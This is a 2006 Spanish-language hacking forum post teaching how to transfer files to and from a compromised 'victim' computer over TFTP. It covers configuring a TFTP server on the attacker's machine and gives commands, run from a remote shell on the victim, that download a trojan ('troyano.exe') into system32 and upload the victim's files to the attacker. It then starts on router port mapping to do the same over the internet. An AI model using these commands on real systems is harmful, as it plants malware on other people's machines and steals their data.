SUBIR ARCHIVOS A UNA VICTIMA POR TFTP

« Respuesta #4 en: 11 Marzo 2006, 05:14 »

SUBIR ARCHIVOS A UNA VICTIMA POR TFTP

Este es un tema que se repite hasta el cansancio en casi cualquier foro que de hacking se
refiera, así de voy a explicar como subir archivos a una victima nuestra por medio de
TFTP, claro que también se puede hacer por medio de ftp pero esa es otra historia,
además como TFTP no requiere autentificación será mas rápido trabajar con el.

CONFIGURANDO EL SERVIDOR TFTP EN NUESTRO PROPIO

ORDENADOR

La mejor forma de hacer que esto funcione es colocando el servidor TFTP en nuestro
propio equipo, para ello yo voy a utilizar un servidor TFTP llamado “SolarWinds TFTP
Server”, si quieren utilizar este mismo ustedes pueden descargárselo de su pagina
oficial:
www.solarwinds.net

En la instalación no existe ninguna opción novedosa asi de que basta con dar siepre en
boton siguiente.

Una vez instalado procedemos a configurarlo, para ello primero lo ejecutamos desde el
menú inicio, si por alguna razon les aparece esta ventana del firewall de Windows:

Solo es cuestion de presionar desbloquear para ya no nos este dando dando lata todo el
tiempo.

Una vez abierto nos aparecera la siguiente ventana:

Como podran observar, la carpeta ubicada dentro de C:\TFTP-Root es la carpeta que

contendra los archivos tanto que le vamos a subir a la victima como que tambien le
vamos a bajar a ella.

Nos Desplazamos hasta File – Configure y en la ventana que se nos abrira damos clic en
la pestaña de Security, lo que nos dice dicha pestaña es la forma en la que va a trabajar
nuestro servidor de TFTP y como lo vamos a utilizar tanto para descargar como para
subir archivos vamos a seleccionar la ultima opcion que dice “Transmit and Receive
files” y damos clic en OK.

Ahora si ya tenemos todo lo necesario para poder transmitir y recibir archivos de

nuestra victima (recuerden no cerrar esta ventana por que si lo hacen cerraran el
servidor tftp).
Claro que para poder subirle o bajarle algun archivo primero tenemos que haber
obtenido una shell remota de nuestra victima, en estos momentos no voy a explicar
como hacerlo debido a que es mejor que aprendan primero a usar TFTP antes de
ponerse a andar entrando a cualquier computadora como si fueran niños con juguete
nuevo.

SUBIR UN ARCHIVO

Antes de continuar y asi evitar posibles confusiones con las ips vamos a utilizar las
siguientes:
Equipo atacante: 192.168.1.2    ---- Esta ip es la de nosotros
Equipo victima: 192.168.1.3

Para poder subir un archivo a nuestra victima, primero tenemos que colocar dentro de la
carpeta TFTP-Root de nuestro equipo el archivo que le queramos subir y después de
ello solo nos basta con teclear desde la shell remota:
Código:
C:\tftp –i 192.168.1.2 get troyano.exe c:\Windows\system32

Con este commando lo que hacemos es obtener el archivo troyano.exe de nuestra

carpeta TFTP-Root y lo colocamos en la carpeta system32 del equipo victima.

BAJARLE UN ARCHIVO A NUESTRA VICTIMA

Esta vez no nos vamos a conformar con solo subirle archivos a la victima sino que
tambien le vamos a bajar algunos archivos de el en los cules nosotros estemos
interesados (que tal y tiene escondidos unos buenos discos de musica por alli que
nosotros nunca hemos podido encontrar xD).

Suponiendo que nuestra victima tenga un archivos llamado pista1.mp3 dentro de la

carpeta C:\music tendriamos que teclear desde la shell:
Código:
tftp –i 192.168.1.2 put c:\music\pista1.mp3 pista1.mp3

de esta forma solo es cuestion de esperar a que termine la transferencia y ya tendremos

el archivo dentro de la carpeta de nuestro servidor lista para ser utilzada por nosotros.

Ahora si ya sabemos como utilizar nuestro servidor TFTP con éxito para subirle y
bajarle archivos a nuestra victima pero no todo en la vida es asi de sencillo, si son
observadores abran notado que en mis ejemplos utilice dos IP’s Privadas, debido a que
estoy dentro de una red y ambos equipos lo estan no tuve ningun problema para pasar
archivos de un host a otro.

De igual forma si nosotros estamos conectados directamente a  Internet y nuestra

victima tambien lo esta, basta con que observemos la ip que nos da el comando ipconfig
y esa sera la IP que usaremos, hasta aquí no tenemos ningun inconveniente.

Pero ¿Qué pasa si nosotros estamos conectados a Internet por medio de una red?
Lógicamente no podremos realizar estos comandos con éxito por que la ip que tenemos
en estos momentos es inaccesible desde Internet, y el servidor TFTP debe de estar con
contacto directo a Internet así de que si tenemos un router delante de nosotros para
podernos conectar a Internet lamento decirles que no podemos hacer nada al respecto y
nos perderemos de toda esta diversión…

Nah!!! Solo estaba bromeando, un router no es cosa difícil para nosotros y vamos a
solucionarlo realizando un proceso que se llama Mapear puertos en el router.